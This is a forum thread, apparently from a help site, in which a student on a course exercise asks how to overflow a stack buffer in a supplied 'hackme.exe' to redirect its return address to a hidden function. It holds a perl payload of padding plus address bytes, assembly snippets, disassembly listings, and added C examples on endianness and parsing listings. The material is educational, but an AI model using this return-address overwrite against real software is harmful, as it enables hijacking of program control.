C++ : Change Stack Address

darence asked
Medium Priority
Last Modified: 2012-05-05
I am doing a school project.. Stack Overrun.

I have an address of: 00401D00

I managed to find the last pointer.
Now I intend to write the pointer to the address.
Any idea?

My lecture notes are somehow using perl..
converted "\x28\x13\x40" to an address: 401328

Please advise.

What are you exactly trying to do?

You have to use assembly language to achieve the result, and it is not recommended to do so except in very, very rare cases, e.g. exception handling where the language does not provide support for it. Another is code related to powering on and off. Another one is inside a debugger. And you have to be ***extremely*** careful of what you are doing, because the return address of/to the caller code is stored on the stack. Even main() gets called from somewhere else. I hope that is enough of a warning/discouragement to avoid the usage. Anyways, here is one way to do it. It is in the MSVC environment and for x86-based processors.
void foo() {
  // some code
  int tmp_esp = 0x00401328; // the new stack pointer value (ESP is 32 bits on x86)
  __asm mov esp, tmp_esp;   // MSVC inline assembly: load ESP from the local variable
}


I am trying to find the return address and change the address to some place.
In this case, it's 00401D00.

I managed to find the return address, except how to point it to 00401D00.
I think I need to find the assembly language to point to 00401D00.

Sorry, I misunderstood the question.
Ok, so you want to change the return address that is stored on the stack to 0x00401D00. The first thing that you would need to do is find where the ret addr for the current function is stored, i.e. the location on the stack which stores the IP where we would go after exiting the current function if we don't fiddle with it manually. Then you store 0x00401D00 to that location. Free up any dynamic memory that you need to, and return.


Dear jhshukla..
How can I "store" 0x00401D00 into it?

Is it just AAAAAAAAA."0x00401D00"?

Darence, what processor architecture are you coding for?
Let's say you determine that the return address for the current function is 0x01234567. How did you figure it out? What memory location did you read to get the information? Let's call (i.e. name) that memory location 'ret_addr_loc'. Now what you do is overwrite the 32-bit value (0x01234567) at that location with the new value (0x00401D00).

For x86-based processors the assembly code is
mov dword ptr [ret_addr_loc], 0x00401D00
Depending on what compiler you are using, the ways to incorporate assembly code into C++ code will differ. Look up the documentation for your compiler.


I am using DEV-C++
Output is a .exe file.
From my sample assignment,
to get the address 401328,
they use: "\x28\x13\x40"

Please advise.

Can you post the code snippet?

The machine you are using is little-endian. See http://en.wikipedia.org/wiki/Endianness for details. Basically, in the group of four bytes the least significant byte is stored first, then the next significant and so on. E.g. while you write 0x2357 (two bytes) as 00100011 01010111 in binary, it is stored as 01010111 00100011, i.e. 0x57 0x23, in memory. So, your string when interpreted as an int becomes 0x401328. Now recall the fact that C-style strings are null terminated. That adds a zero at the end, making a total of 4 bytes, x28 x13 x40 x00. This becomes 0x00401328 when interpreted as an integer.
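To make the byte-order explanation above concrete, here is an added example in C (not code from the thread or from the hackme assignment). It interprets the quoted escape strings as little-endian 32-bit values, with bytes beyond the string treated as zero the way a C string's terminating NUL supplies them, does the reverse conversion byte by byte, and checks the host's own byte order with memcpy. The inputs are constructed from the byte strings quoted in the thread; the function names are my own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Interpret up to four bytes as a little-endian 32-bit integer: byte 0 is the
 * least significant. Bytes beyond `n` count as zero, which is exactly what the
 * terminating NUL of a C string supplies when the 3-byte escape "\x28\x13\x40"
 * is read as a 4-byte value. */
uint32_t le_bytes_to_u32(const unsigned char *b, size_t n)
{
    uint32_t v = 0;
    if (n > 4) n = 4;
    for (size_t i = 0; i < n; i++)
        v |= (uint32_t)b[i] << (8 * i);
    return v;
}

/* The i-th byte (0 = least significant) of `v` as it would sit in memory on a
 * little-endian machine. */
unsigned char le_byte_at(uint32_t v, int i)
{
    return (unsigned char)(v >> (8 * i));
}

/* The reverse of le_bytes_to_u32: emit all four little-endian bytes. */
void u32_to_le_bytes(uint32_t v, unsigned char out[4])
{
    for (int i = 0; i < 4; i++)
        out[i] = le_byte_at(v, i);
}

/* Check the host's byte order the same way: store a known value and look at
 * which byte lands first in memory. Returns 1 on a little-endian host. */
int host_is_little_endian(void)
{
    uint32_t probe = 0x00401328u;
    unsigned char first;
    memcpy(&first, &probe, 1);
    return first == 0x28;
}

int main(void)
{
    /* Constructed inputs: the two escape strings quoted in the thread. The
     * array initialisers include the terminating NUL, so sizeof is 4. */
    const unsigned char s1[] = "\x28\x13\x40";
    const unsigned char s2[] = "\x50\x1E\x40";
    unsigned char back[4];

    printf("\"\\x28\\x13\\x40\" + NUL -> 0x%08X\n", le_bytes_to_u32(s1, sizeof s1));
    printf("\"\\x50\\x1E\\x40\" + NUL -> 0x%08X\n", le_bytes_to_u32(s2, sizeof s2));
    u32_to_le_bytes(0x00401C90u, back);
    printf("0x00401C90 in memory -> %02X %02X %02X %02X\n",
           back[0], back[1], back[2], back[3]);
    printf("this host is %s-endian\n", host_is_little_endian() ? "little" : "big");
    return 0;
}
```

The same conversion applies to the 0x00401E50 string later in the thread: the three escaped bytes plus the NUL give 50 1E 40 00 in memory, which reads back as 0x00401E50.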



I am given this EXE file.
The main thing is using a perl file to invoke the illegal BAR function..
Upon executing, the BAR address will be shown.
I am supposed to find the number of A's (being 41) before it goes to the return function.

I calculated it to be 20 A's.. but now I do not know how to make the program GO to the bar address.

The syntax of using it is: hackme 3219914 AAAAAAAAAAblah blah blah..

If you manage to "change" the return address to BAR,
you should get a MSG saying I HAVE BEEN HACKED.



This is a sample of the perl file I am talking about.
$arg = "3219914 AAAAAAAAAAAAAAAAAAAA" . "\x50\x1E\x40";   # 20 A's, then the three bytes that read as 0x00401E50 on a little-endian machine
$cmd = "hackme " . $arg;                                    # the assignment's hackme.exe, run with $arg as its command line
system($cmd);

It seems that IF I use this "\x50\x1E\x40";
I am able to get into a BAR4 FUNCTION..
which should not be the case, as I should be getting into a BAR function..

You should be getting inside the bar0 function. Get XVI32 from http://www.chmaas.handshake.de/delphi/freeware/xvi32/xvi32.htm. No installation is required. Just unzip ALL files into one directory & run xvi32.exe. Open hackme.exe from it and search for "I have been hacked". You will find that the string preceding it is "Inside bar0 function. \n"


I found it..
So what can I do?
This program is supposed to GET INTO the bar0 function.
But IF I know the address, how am I going to "translate" that into whatever language is "\x50\x1E\x40".... :)
I think it is probably too late for your assignment, but this link might help you for upcoming projects: http://www.smidgeonsoft.prohosting.com/software.html. Get PEBrowse Professional.

Install and open the prog. Open hackme.exe with this prog.
Search for "bar4". Scroll up to the nearest location where you see "; <==0x0040xxxx(*+0xxxx), ...". This means that code jumps to the current location from these listed addresses. The numbers inside () are offsets from the current location.
The current location is 0x00401E50. This turns out to be your "magic" string that you use to get into bar4. You will see that it is linked from three different addresses.

Now search for bar0. Similarly, scroll up to find a location which is linked from three different addresses. There is also one link target right before the PUSH call. Instinct tells me that this is probably not the desired address. The desired address is 0x00401C90. Try it. If that does not work, brute force your way going forward one instruction at a time.


hackme.exe Section .text (0x00401000)
0x401C90: 55                     PUSH        EBP                ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)
0x401C91: 89E5                   MOV         EBP,ESP            
0x401C93: 83EC08                 SUB         ESP,0x8            
0x401C96: 83C4F8                 ADD         ESP,0xF8          
0x401C99: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401C9E: 83C4F8                 ADD         ESP,0xF8           ; <==0x00401C6C(*-0x32)
0x401CA1: 68631C4000             PUSH        0x401C63           ; .text:Inside bar0 function. |
0x401CA6: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CAB: E8FC1E0000             CALL        0x403BAC          
0x401CB0: 83C410                 ADD         ESP,0x10          
0x401CB3: 89C0                   MOV         EAX,EAX            
0x401CB5: 50                     PUSH        EAX                
0x401CB6: E8B5F90000             CALL        0x411670          
0x401CBB: 83C410                 ADD         ESP,0x10          
0x401CBE: 83C4F8                 ADD         ESP,0xF8          
0x401CC1: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401CC6: 83C4F8                 ADD         ESP,0xF8          
0x401CC9: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401CCE: 6828304100             PUSH        0x413028           ; .data:,0A
0x401CD3: E8D41E0000             CALL        0x403BAC          
0x401CD8: 83C410                 ADD         ESP,0x10          
0x401CDB: 89C0                   MOV         EAX,EAX            
0x401CDD: 50                     PUSH        EAX                
0x401CDE: E88DF90000             CALL        0x411670          
0x401CE3: 83C410                 ADD         ESP,0x10          
0x401CE6: C9                     LEAVE                          
0x401CE7: C3                     RET                            

hackme.exe Section .text (0x00401000)
0x401E50: 55                     PUSH        EBP                ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)
0x401E51: 89E5                   MOV         EBP,ESP            
0x401E53: 83EC08                 SUB         ESP,0x8            
0x401E56: 83C4F8                 ADD         ESP,0xF8          
0x401E59: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E5E: 83C4F8                 ADD         ESP,0xF8          
0x401E61: 68381E4000             PUSH        0x401E38           ; .text:Inside bar4 function. |
0x401E66: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E6B: E83C1D0000             CALL        0x403BAC          
0x401E70: 83C410                 ADD         ESP,0x10          
0x401E73: 89C0                   MOV         EAX,EAX            
0x401E75: 50                     PUSH        EAX                
0x401E76: E8F5F70000             CALL        0x411670          
0x401E7B: 83C410                 ADD         ESP,0x10          
0x401E7E: 83C4F8                 ADD         ESP,0xF8          
0x401E81: 6810404000             PUSH        0x404010           ; .text:0x55 0x89 0xE5 0x83
0x401E86: 83C4F8                 ADD         ESP,0xF8          
0x401E89: 687B1C4000             PUSH        0x401C7B           ; .text:I have been hacked!|
0x401E8E: 6828304100             PUSH        0x413028           ; .data:,0A
0x401E93: E8141D0000             CALL        0x403BAC          
0x401E98: 83C410                 ADD         ESP,0x10          
0x401E9B: 89C0                   MOV         EAX,EAX            
0x401E9D: 50                     PUSH        EAX                
0x401E9E: E8CDF70000             CALL        0x411670          
0x401EA3: 83C410                 ADD         ESP,0x10          
0x401EA6: C9                     LEAVE                          
0x401EA7: C3                     RET                            
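The navigation described above relies on two things that are visible in a PEBrowse listing: the PUSH EBP / MOV EBP,ESP prologue (bytes 55 89 E5) that marks a function entry, and the "; <==" list of addresses that jump or call to that line. As an added example (not part of the thread and not PEBrowse's own code), the following C program parses listing lines in that format and reports entries that start with the prologue and are referenced from at least a given number of sites. The sample lines are copied from the listing in this thread; the function names and the assumption that referrer addresses are written as 0x........(*+0x...) after "<==" are my own.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed sample: lines copied from the PEBrowse listing in this thread,
 * kept in listing order so the prologue check can look at consecutive lines. */
static const char *const SAMPLE_LISTING[] = {
    "hackme.exe Section .text (0x00401000)",
    "0x401C90: 55                     PUSH        EBP                ; <==0x00402343(*+0x6B3), 0x00402523(*+0x893), 0x00402703(*+0xA73)",
    "0x401C91: 89E5                   MOV         EBP,ESP",
    "0x401C9E: 83C4F8                 ADD         ESP,0xF8           ; <==0x00401C6C(*-0x32)",
    "0x401CE7: C3                     RET",
    "0x401E50: 55                     PUSH        EBP                ; <==0x004025E3(*+0x793), 0x00402403(*+0x5B3), 0x004027C3(*+0x973)",
    "0x401E51: 89E5                   MOV         EBP,ESP",
    "0x401E53: 83EC08                 SUB         ESP,0x8",
};
#define SAMPLE_COUNT (sizeof SAMPLE_LISTING / sizeof SAMPLE_LISTING[0])

/* Copy the n-th whitespace-separated token of `line` into `buf` (0-based).
 * Returns 1 if that token exists, 0 otherwise. */
static int nth_token(const char *line, int n, char *buf, size_t buflen)
{
    const char *p = line;
    for (int i = 0;; i++) {
        while (*p && isspace((unsigned char)*p)) p++;
        if (!*p) return 0;
        const char *start = p;
        while (*p && !isspace((unsigned char)*p)) p++;
        if (i == n) {
            size_t len = (size_t)(p - start);
            if (len >= buflen) len = buflen - 1;
            memcpy(buf, start, len);
            buf[len] = '\0';
            return 1;
        }
    }
}

/* Address at the start of a listing line ("0x401C90: ..."), or 0 if absent. */
uint32_t line_address(const char *line)
{
    unsigned int a = 0;
    return sscanf(line, "0x%x:", &a) == 1 ? (uint32_t)a : 0;
}

/* Number of referring addresses after the "<==" marker. Each referrer is
 * written as 0x........(*+0x...); the "(*+0x...)" part is a relative offset,
 * not another referrer, so a "0x" preceded by '+' or '-' is skipped. */
int count_xrefs(const char *line)
{
    const char *mark = strstr(line, "<==");
    if (!mark) return 0;
    int n = 0;
    for (const char *p = strstr(mark, "0x"); p; p = strstr(p + 2, "0x"))
        if (p[-1] != '+' && p[-1] != '-') n++;
    return n;
}

/* True when `line` is PUSH EBP and `next` is MOV EBP,ESP: the frame-pointer
 * prologue that marks the entry of a 32-bit x86 function in this listing. */
int is_prologue(const char *line, const char *next)
{
    char m1[16], o1[16], m2[16], o2[16];
    if (!nth_token(line, 2, m1, sizeof m1) || !nth_token(line, 3, o1, sizeof o1)) return 0;
    if (!nth_token(next, 2, m2, sizeof m2) || !nth_token(next, 3, o2, sizeof o2)) return 0;
    return strcmp(m1, "PUSH") == 0 && strcmp(o1, "EBP") == 0 &&
           strcmp(m2, "MOV") == 0 && strcmp(o2, "EBP,ESP") == 0;
}

/* Collect entry addresses of functions that begin with the prologue and are
 * referenced from at least `min_xrefs` call/jump sites. Returns the count. */
size_t find_function_entries(const char *const *lines, size_t nlines, int min_xrefs,
                             uint32_t *out, size_t max_out)
{
    size_t found = 0;
    for (size_t i = 0; i + 1 < nlines && found < max_out; i++)
        if (is_prologue(lines[i], lines[i + 1]) && count_xrefs(lines[i]) >= min_xrefs)
            out[found++] = line_address(lines[i]);
    return found;
}

/* Run the search over the embedded sample and return the idx-th hit (0 if none). */
uint32_t sample_entry(size_t idx)
{
    uint32_t hits[16];
    size_t n = find_function_entries(SAMPLE_LISTING, SAMPLE_COUNT, 3, hits, 16);
    return idx < n ? hits[idx] : 0;
}

int main(void)
{
    for (size_t i = 0; sample_entry(i) != 0; i++)
        printf("function entry with >=3 referrers at 0x%08X\n", sample_entry(i));
    return 0;
}
```

On the sample, the line at 0x401C9E also carries a "<==" annotation but is an ADD, not a prologue, so it is skipped; only 0x401C90 and 0x401E50 are reported, matching the two functions shown in the listing.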

BTW, I just figured that 0x00401D00 is bar1. Are you, by any chance, trying to return to bar1 from bar0?